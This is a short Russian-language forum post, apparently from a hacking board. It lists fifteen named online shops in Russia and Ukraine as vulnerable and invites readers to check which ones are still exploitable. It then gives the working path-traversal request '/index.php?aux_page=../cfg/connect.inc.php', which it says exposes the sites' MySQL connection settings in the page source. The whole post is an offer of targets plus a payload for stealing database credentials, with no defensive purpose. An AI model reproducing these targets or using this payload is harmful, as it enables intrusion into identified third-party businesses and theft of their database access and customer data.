Когда-то нагуглил несколько уязвимых шопов, хз какие еще актуальны- кому не лень, проверьте:

3000.com.ua
dinaris.dp.ua
dmcoins.ru
gokom.ru
lidashoes.ru
philatelist.ru
pokupka.net.ua
rosspen.ru
smolotka.kiev.ua
tetramet.ru
vastudio.ru
velomot.com
vitlen.com.ua
vliga.irkutsk.ru
x-group.kiev.ua

Уязвимый скрипт с параметром:
/index.php?aux_page=../cfg/connect.inc.php
В исходнике страницы выводит настройки подключения к mysql